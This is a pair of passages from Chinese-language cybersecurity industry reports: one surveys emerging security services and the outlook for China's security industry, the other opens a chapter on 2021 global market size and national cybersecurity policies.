和完美保密性,增强了密钥的安全性。 尽管目前量子安全技术仍存在技术高成本和复杂性、标 准化和统一规范尚不成熟、易遭受侧信道攻击等问题,商业 应用还处于早期阶段,距广泛应用落地尚需时间,但其在特 定领域中的实际应用展现出了巨大的发展潜力,电信、金融、 监管等对安全性要求高的部门已开始部署 QKD 系统来确保 通信的保密性。在可预见的未来,量子安全技术将广泛应用 于金融、电信、军事等涉及国家安全、经济安全、国防安全、 产业安全和民生安全的重点领域,政府、学术机构和企业将 继续加大研发投入,加深合作力度,加速量子安全技术创新 和应用落地,助力信息安全步入量子计算时代。 (四)云原生安全 近年来,伴随云计算和容器化技术的广泛应用,企业将 应用和数据逐步迁移到云平台,安全威胁也随之增加。传统 的安全解决方案难以充分适应云原生架构的特点和需求,云 原生安全技术和服务应运而生。云原生安全技术和服务针对 云环境中的安全需求,提供一系列技术、工具和服务以保护 云上应用和数据的安全,具体包括:云环境的实时监测和审 计、漏洞扫描和风险评估、访问控制和身份验证、日志管理 和分析,以及威胁情报和事件响应等。云原生安全工具和技 术能够检测和预防云环境中的恶意活动、数据泄露、网络入 侵等安全威胁,并进行实时监控和警报,帮助企业及时发现 和应对潜在的网络安全漏洞和攻击。通过云原生安全技术服 务,企业可以提高云环境的安全性和可信度,保护敏感数据 和业务运行的连续性。 与传统的安全技术相比,云原生安全技术更能适应云原 生架构,可提供实时监测和防护,自动化和智能化水平更高, 可扩展性更强。但目前,云原生安全服务仍存在复杂云环境 的高技术资源投入要求、与传统安全解决方案的集成困难、 安全服务效果对云平台的安全性能和配置依赖程度高等不 足,需要综合考虑多方面因素来实现全面的云安全保护。目 前,云原生安全主要应用于企业级云平台、云原生应用开发 和部署、容器化环境以及云原生数据库等场景。未来,随着 企业对云环境的依赖程度不断加深,云原生安全技术服务需 求将不断增长,并在云环境安全性增强、实时威胁检测和响 应、多云环境的集中管理、合规性和监管要求、可视化的安 全分析和报告等领域得到更为广泛且深入的应用。当前,国 内诸多企业在云原生安全相关领域已有相对成熟的技术和 较大的投入,并已有产品落地应用,市场前景将十分广阔。 (五) 网络安全保险服务 当前,我国数字经济快速发展, 网络安全基础性、保障 性作用逐步增强。网络安全保险作为具有网络安全风险管理 和经济补偿功能的新型网络安全服务12,对于提升企业网络 安全风险应对能力,促进中小企业数字化转型发展,推进构 建网络安全社会化服务体系具有重要意义。2023 年 7 月,工 业和信息化部、国家金融监督管理总局联合印发《关于促进 网络安全保险规范健康发展的意见》, 提出促进网络安全保 险规范健康发展。 网络安全保险服务旨在通过制定保险政策、开展风险评 估和管理、提供应急响应服务和技术支持培训等服务帮助企 业管理和降低网络安全风险,在网络安全事件发生时,网络 12 光明网. 网络安全保险保障数字经济高质量发展.2023-07. 安全保险服务能够为企业提供相应补偿,以减轻企业在财务 和名誉方面的损失。目前,我国网络安全保险服务模式主要 有两种:一是面向企业网络安全风险管理需求的“保险服务+ 安全风控”模式,保险公司发挥主导作用,借助网络安全企业、 专业网络安全测评机构的网络安全技术能力、场景化评估分 析能力和数据整合分析能力,开展产品开发、核保定价、防 灾减损等保险服务,为企业提供网络安全财产损失险、责任 险、综合险等保险产品。二是面向网络安全产品残余风险转 移需求的“ 安全防护+保险保障”模式, 由网络安全企业主导, 为客户提供网络安全防护类产品的同时,附加网络安全专门 保险,如在招标文件中明确网络安全服务中包含为服务责任 兜底的网络安全保险产品。 据全球知名研究机构 CyberVentures 估计,到 2025 年, 全球网络犯罪将造成 10.5 万亿美元的损失,这会对企业、公 众、政府都产生巨大负担,网络安全保险在防范、转移和分 担该损失中将发挥越来越巨大的积极作用。目前国内网络安 全企业纷纷试水网络安全保险业务,未来几年是网络安全保 险快速发展的重要机遇期,将迎来更多网络安全保险新产 品、新服务、新模式的创新和落地。 (六)安全审计和合规性服务 网络安全审计和合规性是保护企业数据安全的重要环 节,是加强关键业务信息和客户数据安全保护的重要手段, 也是满足日益丰富和细化的网络安全法律法规和政策标准 合规性要求的重要途径。通过评估和改进网络安全措施,确 保符合相关的合规性标准,不仅可以帮助企业进一步夯实网 络安全基础,提升潜在网络安全威胁和风险防范能力,也可 以帮助企业满足相关政策法规要求,避免承担网络安全相关 法律责任和声誉损失,真正实现业务不宕机、合规不踩线。 安全审计和合规性服务是指对组织的信息系统进行安全 审计,以确保它们符合相关法规和标准。该服务旨在发现潜 在的安全漏洞,评估安全控制的有效性,并确定是否存在任 何违规行为。安全审计服务包含安全控制评估、安全漏洞扫 描、安全策略审查、安全事件响应评估等;合规性服务包含 法规合规性评估、标准合规性评估、行业合规性评估等。通 过开展安全审计和合规性服务,可以评估和改进网络安全控 制措施、策略和流程,提高企业整体的安全水平。但是,安 全审计和合规性服务也存在资金成本较高、服务范围和深度 有限、难以及时跟进最新技术变化和政策要求等不足。当前, 安全审计和合规性服务已广泛应用于金融、医疗健康、零售 和电子商务、能源和公用事业等领域,部分企业已面向各类 客户提供安全控制评估、安全漏洞扫描、安全策略审查、安 全事件响应评估等安全审计服务,以及法规合规性评估、标 准合规性评估、行业合规性评估等合规性服务。未来在多领 域技术带动下,安全审计和合规性服务将朝着自动化、智能 化和融合化发展,拓展衍生云安全审计、物联网安全审计、 区块链合规性审计等多领域网络安全审计和合规性服务,从 而降低服务成本、提高服务时效性和有效性。 (七) 网络安全防护有效性验证服务 据 Gartner 的调查显示,97%的网络入侵行为发生在已 经部署网络安全防护系统的公司,99%的网络攻击行为是使 用已知并且存在多年的攻击方式或者漏洞,95%的绕过安全 防护设备的入侵攻击行为是由错误配置造成的。由此可见, 即使各类安全防护设备已做好部署,如果没有持续升级或正 确配置网络安全防护策略,这些安全防护设备仍然无法发挥 最大效果,难以有效防范网络安全入侵。因此,网络安全防 护有效性验证服务的重要性日益凸显, 网络安全验证成为 Gartner 发布的 2023 年 9 大主要网络安全趋势之一,指汇集 多项技术、流程和工具,对潜在攻击者利用已知威胁暴露面 的方式进行验证。网络安全防护有效性验证服务能够提供模 拟攻击验证的方法,检验各类设备的防护策略是否有效,全 面评估防御的有效性并测试出防护短板,帮助企业了解其网 络系统的安全状况,识别潜在的安全风险,并提出相应的解 决措施。当前,国内一些网络安全企业通过漏洞扫描、渗透 测试、入侵与模拟攻击、安全配置审核和风险评估等网络安 全测试,验证客户网络安全防护的有效性。综上所述,网络 安全防护有效性验证服务是网络安全运营体系的补充,将成 为企业增强网络安全性、保障网络稳定运行的重要抓手。 (八)云密码服务 大数据、人工智能、移动互联网、物联网等技术的蓬勃 发展离不开云计算的支撑,传统的信息技术和产品需要从产 品形态、部署方式、商业模式等各层面适应云计算中的服务 化需求。当前,在云计算迅猛的发展迅势头中,安全成为掣 肘云计算发展的最关键问题,作为网络安全核心技术和基础 支撑的密码技术在云计算中的作用变得更为重要。我国高度 重视网络安全保障中的密码技术,将密码作为国家的重要战 略资源,在金融、国防、电信等重要应用领域全面推广应用 国产密码算法。《网络安全法》、网络安全等级保护制度 2.0 和《密码法》中,对云计算环境的安全建设提出要求,明确 三级及以上的系统需要进行密码应用安全性测评。 云密码服务是一种全新的密码功能交付模式,是云计算 技术与身份认证、授权访问、传输加密、存储加密等密码技 术的深度融合。密码服务提供商按照云计算技术架构的要求 整合密码产品、密码使用策略、密码服务接口和服务流程, 将密码系统设计、部署、运维、管理、计费等组合成一种服 务,来解决用户的密码应用需求。根据云计算中的密码应用 需求 , 云密码服务可以分为三类 : 云密码资源服务 (Cryptography Resource as a Service,CRaaS)、云密码功能 服务(Cryptography Function as a Service ,CFaaS)、云密码 业务服务(Cryptography Business as a Service,CBaaS) 。 CRaaS 、CFaaS 、CBaaS 构成了从低到高的层级关系,低层 可为高层提供密码服务支撑,并且每一类也可直接为用户提 供服务,用户可通过自身信息系统部署环境, 以及自建的信 息系统的边界选择相应的服务类型。 在云、移动端、物联网等新场景需求带动下,云密码服 务将在工控、车联网、数字安防等领域逐步实现大规模应用。 当前, 网络安全企业正在将密码服务与云计算平台进行结 合,通过调度加密机集群动态扩充密码运算能力,使密码运 算速度显著提高,增强了系统稳定性,为用户提供集中化、 虚拟化、透明化的密码运算服务。在政策合规和云计算技术 发展的双重驱动下,云密码服务或将成为网络安全细分领域 的一片新蓝海。 (九)数据安全治理 数据安全是网络空间安全的关键所在,也是国家安全的 重要组成部分。随着数据安全产业迅猛发展,数据安全单点 产品数量逐步增加,但是,数据安全工具的碎片化影响了实 际产品效能,急需构建全面、系统的数据安全治理体系,实 现对数据安全风险的主动防御和综合防御,确保数据的安全 高效利用。 早在 2017 年,Gartner 便在其召开的安全与风险管理峰 会上提出了数据安全治理理念,认为数据安全治理不仅是一 套用工具组合而成的产品级解决方案,更是从决策层到技术 层,从管理制度到工具支撑, 自上而下贯穿整个组织架构的 完整链条。国内网络安全企业经过数年的探索推广,形成一 系列保护和管理客户数据安全的工具和服务,涵盖数据安全 的策略制定、规范制定、风险评估、监控和培训等方面。数 据安全治理服务的核心在于确保数据得到适当保护,防止数 据泄露、滥用或未经授权的访问。通过有效的数据安全治理 服务,企业可以建立较为完备的数据安全管理体系,进而降 低数据安全风险。 未来,数据安全治理将在个人信息保护、数据共享与合 作、云计算和大数据安全、边缘计算和物联网安全、数据伦 理和隐私保护以及 AI 与数据安全等领域发挥越来越突出的 作用。但也应注意,数据安全治理服务在自动化程度、安全 与隐私平衡、新兴技术应用风险以及用户安全意识等方面仍 存在较大挑战。随着技术发展和理论体系逐步完善,数据安 全治理将不断创新和演进, 以上问题有望得到解决和改进, 从而增强对数据安全风险的主动性、体系化防御能力。 (十)软件供应链安全治理 2023 年, 软件供应链的安全威胁和风险继续攀升,据 Gartner 分析,到 2025 年,全球 45%的组织和企业的软件供 应链将遭受攻击。软件供应链攻击是指针对软件供应链所发 动的网络攻击,攻击者会先攻击软件供应链中安全防护相对 薄弱的部分,然后再利用软件供应链之间的相互连接(如软 件供应、开源应用)等,将风险扩大至上下游企业,对大量 供应商和最终用户带来巨大影响。与其它攻击形式相比,软 件供应链攻击往往会产生“ 牵一发而动全身” 的效果。在软件 供应链中,各个环节均可能存在安全风险,例如开发过程中 的代码漏洞、分发过程中的恶意软件、配置和使用过程中的 错误等,这些风险不仅会对企业造成经济损失,还会对用户 的个人信息安全造成威胁。 软件供应链安全治理是指采取针对性防范措施,对软件 开发、分发、安装、配置、使用、维护以及报废等全生命周 期过程中所涉及的各类资源进行管理和控制,以保障软件供 应链中的各个环节和组织进行业务活动和信息交换的安全 性,有效应对软件供应链中各个环节中可能存在的多种安全 威胁。软件供应链安全治理主要包括:供应商管理、采购管 理、开发管理、测试管理、发布管理、运维管理、报废管理 等。通过这些措施,可以确保软件供应链的透明度、可追溯 性和安全可控性。近年来,国内企业越来越关注软件供应链 安全风险治理,多个企业在软件供应链安全治理新模式方面 开展了有益探索,可以看到,全面、高效地保障软件供应链 的安全对于加快数字化进程、推动软件产业高质量发展、切 实保障网络空间安全具有重要意义。 六、我国网络安全产业发展展望 基于多年来对网络安全产业发展动向和趋势的深入分 析研究,对我国网络安全产业未来几年的发展态势作出如下 展望: (一)政策驱动、需求拉动的发展趋势将更加明显 2023 年, 中央和地方相继推出多项网络安全法律法规、 规划政策。如前所述,网信办、发改委、工信部、市场监管 总局等部门出台数据安全、商用密码、网络安全保险、网安 服务认证、政务大数据等政策新规。河北、山东、上海、深 圳、云南、西藏等地相继推出数据安全、关键信息基础设施、 数字政府等新政策。网络安全治理体系将进一步沿着行业、 领域、地域、场景等脉络进行切分和细化,相关规制更加明 确具体。在守法合规的基础上探索发展路径仍是网络安全产 业发展的主要驱动因素,政策导向仍将在很大程度上影响国 家网络安全产业布局和企业重点发力和资源投入方向。数字 经济发展进入快车道开辟了更多网络安全产业“ 新赛道”,数 据安全、云原生安全、工业互联网安全、物联网安全、车联 网安全等应用场景安全需求,智慧城市建设中交通、能源、 医疗等新基建安全需求,5G、人工智能、量子信息、元宇宙 等新技术安全需求,均将成为支撑网络安全市场规模扩容并 高速增长的新板块, 网络安全产业发展逐步向“ 政策+ 需求” 双轮驱动进阶。 (二)产业自主可控的发展趋势将更加明显 近年来,工信部、国资委等部门出台多项政策推进产业 自主可控发展,维护关键基础设施安全,信息技术应用创新 (以下简称信创)产业已走过“试点实践期”,并逐步迈向“ 规 模化推广期” 的关键阶段。随着“ 数字中国”建设规划的逐步推 进,信创产业需求不断释放,从党政信创到行业信创,从金 融、通信到教育、医疗等领域,国产软硬件渗透率快速提升。 2022 年 9 月,国资委发布的 79 号文件要求国企央企落实信 息化系统的国产化改造,明确要求到 2027 年所有中央企业 的信息化系统完成信创替代,范围涵盖芯片、基础软件、操 作系统、中间件等领域,这无疑对信创产业发展产生重大激 励作用。根据《2022 中国信创生态市场研究和选型评估报告》 13数据,2022 年我国信创产业规模达到 9220.2 亿元,近 5 年 复合增长率为 35.7%,预计 2025 年将突破 2 万亿元。信创产 业和网络安全产业息息相关,信创产业的爆发也为网络安全 产业带来重大发展机遇。另外值得关注的是,国产密码技术 取得较大突破,将在基础信息网络、重要信息系统、工业控 制系统等领域得到更加广泛的应用,有力保障我国多领域科 研成果和产业应用的信息安全,为网络安全产业自主可控发 展保驾护航。 13 海比研究院联合中国软件行业协会、中国软件网联合发布。 (三)“产品+服务”双轮驱动的发展趋势将更加明显 持续不断的灾难性网络攻击事件多次印证网络安全风 险关乎企业存亡、产业重构乃至国家安全。面对安全事件层 出不穷、网络威胁不断升级、网络攻击持续演进的趋势,“ 单 一化、碎片化、片面化” 的网络安全产品已经难以应对多重复 杂且持续变化的网络安全风险,越来越多的网络安全企业正 在建立以产品技术为核心,以多元化、系统性服务为竞争抓 手的网络安全业务发展理念,网络安全市场向服务化转型的 趋势愈发明显。数说安全近年的分析数据显示,2018 年至 2022 年以来,网络安全服务项目数量持续增长,在整体网安 项目中的占比逐年提高,2023 年上半年,服务型企业数量同 比增长 32.5%,成为网络安全市场扩容的主要力量。奇安信、 启明星辰、深信服、天融信等行业头部企业也在向“产品+服 务” 综合解决方案的提供商转变。同时,越来越多的用户企业 将网络安全挑战视为重要的商业风险,愈发看重网络安全服 务的有效性、持续性和体系化,网络安全市场将从技术产品 的“ 单打独斗” 向产品和服务相辅相成的方向转型。此外,伴 随虚拟化及云服务理念逐渐深入,网络安全产品正在由以硬 件交付安全产品,人工交付安全服务的形式,逐步向云化、 SaaS 化方式交付技术和服务等形式转变14。 (四)领军企业带动、产业链协同的发展趋势将更加明显 14 数说安全研究院.2023 中国网络安全产业八大趋势. 国内网络安全企业数量众多,业务重点和发展模式各有 所长、各占胜场,各自为战的分散型竞争模式长久存在。随 着网络安全技术持续升级,网络环境和安全需求日益复杂, 对网络安全产品研发、人才资源等方面提出了更高要求,网 络安全市场份额进一步向具有一定技术实力和品牌知名度 的企业集聚。如前所述,头部企业的市场份额呈现逐年上升 趋势,前四名企业的市场份额已经从 2018 年的 21.71%提升 到 2022 年的 28.59%。头部企业对市场的把握和牵引能力更 强,领先优势将进一步扩大。此外,产业链上下游和生态圈 伙伴企业间在技术、市场等方面逐渐呈现协同发展态势。例 如,南水北调集团与奇安信签署战略合作协议以强化国家水 网安全运营,华为、太保产险等企业开展网络安全保险创新 合作,企业间的合作更加频繁。未来,随着新技术、新产品、 新模式加速融合,协同发展、优势互补的网络安全产业生态 将逐步形成。 (五)技术服务“ 智能化+ 主动化” 的发展趋势将更加明 显 近年来,网络攻击手段更加多元、频次更快、影响更大, 政府、企业、组织已经不能满足于对网络安全威胁采取低智 能化的静态防御、被动防御和刚性防御。随着攻击面管理、 威胁狩猎、量子安全技术、隐私计算、数据安全治理、网络 安全防护有效性验证等技术和服务在更多产业和领域更为 广泛的应用,政府、企业和组织的主动防御能力不断提升, 攻防一体的网络安全治理机制逐渐建立。此外,面对日趋复 杂的网络攻防态势演变,网络安全技术正在朝着智能化、多 元化、个性化的方向发展,尤其在人工智能技术创新的持续 推动下,网络安全技术将实现对安全威胁的快速感知、主动 捕获、动态对抗、关联预测,还将支持场景定制化、全局网 络安全联动部署,智能主动安全类产品将迎来规模化应用, 在网络攻防对抗与网络安全防护等方面凸显重要价
standards
第一章 全球网络安全产业发展动态 2021 年,全球网络安全政策的不断加码、数字技术与实体经济 的深度融合以及网络安全形势的愈发严峻都给全球网络安全市场带 来发展机遇。2021 年全球网络安全市场规模超过 1500 亿美元,产品 服务快速演进升级。具体来看,政策方面,美洲、欧洲、亚太等地区 纵深推进网络安全政策举措,为产业发展注入 “ 强心针”。市场主体 方面,网络安全上市企业营收普遍增长,新兴厂商优势凸显。资本方 面,网络安全投融资及并购交易均高度活跃,交易规模均创历史新高。 (一)全球网络安全市场复苏,产品服务快速发展1 1.2021 年全球网络安全市场规模达 1554 亿美元 2021 年全球网络安全市场规模为 1554 亿美元,同比增长 12.2%。 各类因新冠疫情而搁置的网络安全项目在 2021 年以后重新启动,远 程和混合办公模式的增加以及数据泄露事件的激增,都在持续驱动网 络安全市场的进一步扩张。预计 2022 年全球网络安全市场规模将达 1743.9 亿美元,同比增速与 2021 年持平。Gartner 同时指出,地缘政 治、通货膨胀、人才短缺等造成的宏观经济层面的不确定性,可能会 对全球网络安全市场带来影响。 1 本节市场规模、地区分布、产品服务规模数据均来自 Gartner 于 2022 年 6 月发布的报告《Forecast: Information Security and Risk Management,Worldwide,2020-2026,2Q22 Update》 来源: 中国信通院根据 Gartner 数据整理 图 1 2014-2022 年全球网络安全市场规模及增速 2.北美、西欧和亚太地区继续保持三足鼎立格局 在地区分布方面,北美、西欧和亚太地区近年来始终保持三足鼎 立格局 ,构成了全球网络安全最主要的市场区域 ,2021 年三大地区 合计市场份额占全球的 93%。从地区市场增长情况来看,北美、中国 及亚太新兴市场、非洲地区的增速显著高于全球平均水平,市场发展 更具活力。 来源: 中国信通院根据 Gartner 数据整理 图 2 2021 年全球网络安全市场区域分布情况 3.产品服务快速发展,云安全、数据隐私重要性凸显 安全产品方面,2021 年全球网络安全产品市场规模达到 857.8 亿 美元,同比增长 16.8%。从细分类别看,市场份额最高的三类依次是 基础设施保护、检测与访问控制类设备2 、身份管理,2021 年三类产 品的市场份额占比分别为 27.7%、20.7% 、18.2%。目前数据安全领域 仍处于发展初期,市场份额及增速较低,今年 Gartner 数据中新增“数 据隐私”细分类别,与数据安全形成互补,在个人信息收集与隐私保 护方面带来新的产品与解决方案。从各类别增速来看, 云安全以 34. 1%的增速迅速扩张,成为近几年极具发展前景的细分领域;基础 设施保护、身份管理的增速均超过 20%,市场份额有望进一步提升。 来源: 中国信通院根据 Gartner 数据整理 图 3 2021 年全球网络安全产品构成情况 2 检测与访问控制类设备:Gartner 数据报告中的定义为 Network Security Equipment,主要包括防火墙设备、 防火墙及下一代防火墙解决方案、UTM 产品、入侵检测和防御系统、网络访问控制、网络检测与响应、零 信任网络访问等产品。 安全服务方面,2021 年全球网络安全服务市场规模达到 696.5 亿 美元,同比增长 7.0%,主要包括安全咨询、安全外包及托管、安全 实施和硬件支持四大类。 (二)网络安全成为热点话题,政府法规密集落地 1.美国密集出台政策法令提升网络威慑能力 为了维护美国自身网络安全、强化网络威慑,美国政府将网络安 全议题列为优先事项,充分运用一切资源,从提升关键基础设施保护、 推动新技术发展、强化产业合作等角度,不断强化自身网络安全能力, 保持科技领域领先地位。 (1)关基3保护仍旧是美国政策布局焦点 关键基础设施保护方面 ,2021 年 7 月,美国总统拜登签署《关 于改善关键基础设施控制系统网络安全的国家安全备忘录》,要求网 络安全和基础设施安全局(CISA)与美国国家标准与技术研究院 (NIST)等机构合作,制定关键基础设施的网络安全性能目标, 以 保护国家、经济和公共安全。鉴于上述要求,2021 年 9 月,美国国 土安全部发布《关键基础设施控制系统网络安全性能目标》,确定了 九类网络安全最佳实践,并将其作为网络安全性能目标的基础。 (2)政府、制造等重点领域安全要求持续深化 联邦政府加速建设零信任等新型安全防御手段。2021 年 9 月, 3 关基:关键基础设施 美国管理与预算办公室(OMB)和网络安全与基础设施安全局(CISA) 分别就《推动美国政府向零信任网络安全原则迁移》《零信任成熟度 模式》《云安全技术参考架构》三份报告公开征求意见,绘制联邦各 级机构零信任建设路线图。2022 年 1 月美国管理和预算办公室以备 忘录形式正式发布联邦政府零信任战略,要求联邦机构在 2024 年前 实现基于零信任成熟度模型的安全目标,加强抵御日益复杂、持续的 网络威胁活动能力。2021 年 9 月,美国管理和预算办公室发布《提 高联邦政府网络安全事件的调查和补救能力》备忘录,提出事件日志 管理成熟度模型,并要求联邦机构的安全运营中心(SOC)能保持最 高级别的集中访问和可见性,提升事件调查和补救能力。2021 年 10 月,美国白宫发布《通过部署端点检测和响应改进对联邦政府系统网 络安全漏洞和事件的检测》备忘录,要求联邦机构部署 EDR 解决方 案,提高对网络安全事件的早期检测、响应和补救能力,实现整个联 邦政府信息系统的主机级可见性、归因和响应。 制造能源行业安全指导陆续落地。2022 年 3 月,美国 NIST 发布 《保护工业控制系统环境中的信息和系统完整性:制造业网络安全》 指南,对制造商如何减轻工业控制系统完整性风险,加强 OT 系统的 网络安全,保护系统处理的数据等提供指导。2022 年 5 月,美国发 布《2022 制造业网络安全路线图》,公布了未来五年美国制造业加强 竞争、网络安全和供应链管理的一系列优先事项,为美国未来制造业 的网络安全部署明确了基本目标与实施路线。2022 年 6 月,美国能 源部发布《国家网络信息工程战略》, 旨在指导能源部门将网络安全 实践纳入工程系统的设计生命周期,以增强能源系统网络安全弹性能 力,降低网络安全风险。 (3)持续布局 5G 、人工智能等新技术领域 5G 安全方面 ,2021 年 10 月至 12 月,美国先后发布保护 5G 云 基础设施安全的系列指导文件,面向预防和检测横向移动、安全隔离 网络资源、数据保护、确保基础设施完整性等四个方面提供指南,旨 在提升 5G 云基础设施安全防护能力。2022 年 5 月,美国政府发布《5G 安全评估》指南, 旨在解决现有安全评估指南和标准中因 5G 技术的 新功能和服务而产生的差距。 人工智能方面,2021 年 7 月美国《人工智能/机器学习战略计划》 落地,提出利用人工智能和机器学习技术建立安全的网络基础设施, 促进在国土安全任务中使用经验证的 AI/ML 能力, 以及建立一支跨 学科的 AI/ML 人员队伍等目标。2022 年 5 月,美国国家人工智能研 究资源(NAIRR)工作组发布中期报告,阐述了如何构建、设计、运 作和管理美国信息基础设施的愿景,并提出以保护隐私、公民权利和 公民自由的方式来加强和民主化美国 AI 创新生态的战略目标。 (4)积极推动多层级安全合作 国际合作方面 ,2021 年 8 月,美国和新加坡宣布两国签署了扩 大现有网络安全合作的 “谅解备忘录”,除加强信息共享、网络安全 交流之外,两国还将通过联合演习加强合作。2022 年 5 月,美韩发 布联合声明,两国首脑承诺将深化并扩大核心、新兴技术和网络安全 合作。2021 年 10 月,美国与东盟在第二届东盟-美国网络政策对话中, 表达了双方对促进区域网络安全合作和能力建设方面所做工作的肯 定,也探讨了在网络能力建设方面加强区域合作的未来方向。 政企合作方面,2021 年 8 月,亚马逊、苹果、IBM、微软等几家 主要科技集团承诺与美国联邦政府采取一系列措施加强美国网络安 全,其中包括加强自身网络安全、为政府提供资金支持、免费开展安 全意识及人才培训等。2022 年 5 月,美国白宫与开源组织、科技巨 头共同推动一项为期两年的涉及 1.5 亿美元的开源软件保护计划,该 计划涉及安全教育、风险评估、数据清单等 10 个方向。 其他方面 ,2021 年 12 月,为了识别国土安全部系统中的潜在网 络安全漏洞并提高安全弹性,美国推出 “Hack DHS”漏洞赏金计划, 允许黑客报告其系统中的漏洞并换取金钱奖励。 2.欧洲地区加紧战略布局强化网络安全领导地位 近年来,为了安全推动数字化转型、争取网络空间更多主导权, 欧洲主要国家和组织加快推动网络安全战略布局。其中,欧盟从统一 安全能力、发展安全新技术、细化数据安全规则等角度入手,探索提 升整体安全水平;欧洲国家积极发布新国家安全战略并进行相关组织 机构调整,通过强化要素培养的等方式推动网络安全产业发展。 (1)欧盟出台系列举措提升安全领导力 安全能力方面 ,2021 年 9 月,欧盟网络信息与安全局推出一种 行业网络安全评估方法(SCSA),旨在确保各评估认证计划之间的效 率和一致性,促使市场接受网络安全认证部署。2021 年 12 月,欧盟 委员会提出了修订后的网络与信息安全指令 “NIS2”,2022 年 5 月, 欧洲议会和欧盟成员国就《关于在欧盟范围内实施高水平网络安全措 施的指令》(即 “NIS 2” 指令)达成政治协议,该指令扩大了适用范 围、强化了网络安全要求、提升了执法力度、加强了成员国之间联系。 新技术方面 ,2021 年 12 月,网络与信息安全局发布《安全机器 学习算法》报告,报告给出了机器学习算法分类,分析了算法面临的 威胁和漏洞,以及针对上述威胁可以实施的安全控制。 数据安全及相关协议方面 ,2021 年 11 月,欧盟数据保护机构通 过了《关于 GDPR 第三条适用与第五章数据跨境传输条款间相互作用 的指南》,通过对具体的案例进行分析,帮助各成员国更好地理解 GDPR 跨境传输规则。2021 年 12 月,欧盟与韩国达成《GDPR 框架 下的个人数据传输充分性协议》,以后韩国的个人或企业无需采取其 他措施即可获取欧洲个人数据。2022 年 3 月,美欧就新的 “跨大西 洋数据隐私框架”达成原则性协议,美国承诺将实施改革,加强适用 于美国信号情报活动的隐私和公民自由保护。 (2)欧洲各国网络安全战略部署和实施力度显著增强 国家安全战略方面 ,2021 年 5 月以来,德国、英国、俄罗斯、 意大利等纷纷发布国家网络安全战略。其中,德国发布的《2021 年 德国网络安全战略》,明确了加强网络安全保障、综合提升社会 “ 网 络安全能力”的发展目标,并对完善立法、推动政企合作等提出要求; 英国接连发布《2022 年国家网络战略》和《2022-2030 年政府网络安 全战略》,将提升网络安全技能作为英国网络生态系统的重要组成部 分,并针对提升安全管理、发展安全能力、加强检测响应水平、强化 人才培养等,制定了详细的计划清单;俄罗斯发布的新版《俄罗斯联 邦国家安全战略》,将信息安全列为保障国家安全的九大任务之一; 意大利发布的《2022 至 2026 年意大利国家网络安全战略》及《2022 至 2026 年意大利国家网络安全战略实施计划》,针对网络犯罪、供应 链安全、虚假信息等威胁,提出包括增加网络弹性、建立有效网络危 机管理机制等的 5 大应对支柱。 产业举措方面,西班牙、英国分别从增加安全投入、强化要素培 育角度推动网络安全产业发展。其中,2021 年 4 月,西班牙政府承 诺将在三年内投入 4.5 亿欧元,用于促进国家网络安全技术、产业和 人才发展,此外,还开设黑客学院面向 14 周岁以上公民开展网络安 全培训;2021 年 8 月,英国政府提出网络跑道计划, 旨在帮助包括 网络安全在内的网络相关创业者和各家公司获得开发、国际贸易和安 全投资等方面的支持,从而将其创意转化为商业价值。 组织机构方面,俄罗斯、意大利、英国推动网络安全相关组织机 构调整,加强网络安全战略部署。其中,2021 年 5 月,俄罗斯总统 普京签署了确保俄罗斯信息安全额外措施的总统令,要求每个部门、 机构和骨干组织都需内设立 IT 安全部门;2021 年 8 月,意大利议会 批准了政府建立新网络安全机构的计划,该机构需实现的目标包括, 发展国家预防、监测、检测和缓解能力以应对网络安全事件和网络攻 击,并为提高信息和通信技术系统的安全性做出贡献;2021 年 10 月, 英国政府宣布将耗资 50 亿英磅建立国家网络部队总部,新部门将使 得英国具有针对网络攻击的报复性反击能力,由英国国防部和政府通 讯总部(GCHQ)共同运营,将在 2030 年全面投入运营。 3.亚太地区完善安全政策战略提升安全保障能力 为了积极应对网络威胁挑战,亚太地区主要国家和组织持续深化 网络安全布局,通过发布网络安全总体战略、推动重点领域行业安全 保护、强化网络安全生态培养等方式,力图在全球网络空间中占得竞 争优势。 亚太组织方面,2021 年 1 月,东盟发布《东盟数字总体规划2025》, 探索建立一个由安全和变革性的数字服务、技术和生态系统所驱动的 领先数字社区和经济体,并提出包括扩大使用网络安全技术、完善数 据保护相关法律监管措施、促进区域网络应急事件协调应对与合作在 内的 17 项高重要性行动。 同月,东盟发布《东盟数据管理框架》和 《东盟跨境数据流动示范合同条款》, 旨在为区域数字经济和数字贸 易发展制定东盟内部的数据流动规则,确保跨境数据传输过程中的个 人数据保护。 国家网络安全战略方面 ,2021 年 5 月, 日本内阁网络安全中心 发布《下一代网络安全战略纲要》、《网络安全研发战略(修订版)》及 《网络安全委员会倡议》等多份有关网络安全的政策文件,对提高网 络攻击的防御、威慑和态势感知能力,全面加强国际网络合作均提出 更高要求。此外,2021 年 10 月, 日本通过新版《网络安全战略》, 围绕提高优先度、迎合印太、数字改革等方面,明确提出未来 3 年日 本在网络安全领域的政策目标及实施方针。 同月,新加坡政府发布 《2021 新加坡网络安全战略》,战略重视合作、人才、生态等对网络 安全产业的影响,确定了建立弹性基础设施、创建安全的网络空间及 加强国际网络合作三大战略支柱。 数据安全方面 ,2021 年 9 月,澳大利亚发布《隐私影响评估指 南》《COVID- 19 隐私原则》等多份个人信息保护相关文件,从明确 隐私影响评估流程,限制个人健康等敏感信息收集和使用等角度,强 化隐私数据保护。2022 年 2 月, 日本个人信息保护委员会发布《个 人信息保护法》合规要点,帮助企业应对《个人信息保护法》修订实 施带来的合规压力,要点围绕涉及告知与披露要求、数据出境监管、 数据使用合法性要求的六项具体合规要点进行简述。2022 年 4 月, 澳大利亚制定《国家数据安全行动计划》,提出最大化数据的价值、 信任和保护、支持数据使用三个主要原则。 基础设施安全方面 ,2021 年 5 月,澳大利亚政府提出了关键基 础设施提升计划,旨在识别和解决关键基础设施中的漏洞,提升其网 络安全成熟度。2022 年 2 月,新加坡宣布建立国家量子安全网络平 台,该平台将在全国范围内进行量子安全通信技术试验,并加强关键 基础设施的网络安全。此外,为了加强应用系统的安全防护水平,新 加坡正在设施政府信任架构,并鼓励关键信息基础设施所有者对关键 系统采用零信任安全架构。 网络安全产业发展方面 ,2021 年 2 月,韩国公布将在 2023 年之 前计划投入 6700 亿韩元(约 6 亿美元),以增强该国的网络安全实力, 并应对日益增长的新兴网络威胁。 (三)企业主体发展总体良好,新兴厂商优势凸显 1.企业营收保持普遍增长,云安全营收增速显著加快 在营收方面, 虽然 2021 全球新冠疫情多轮反复、供应链调整等 对 IT 和互联网行业的业务发展造成一定影响,但是国际主要网络安 全上市企业营收仍保持普遍增长态势。选取的专业网络安全上市企业 营收数据显示,19 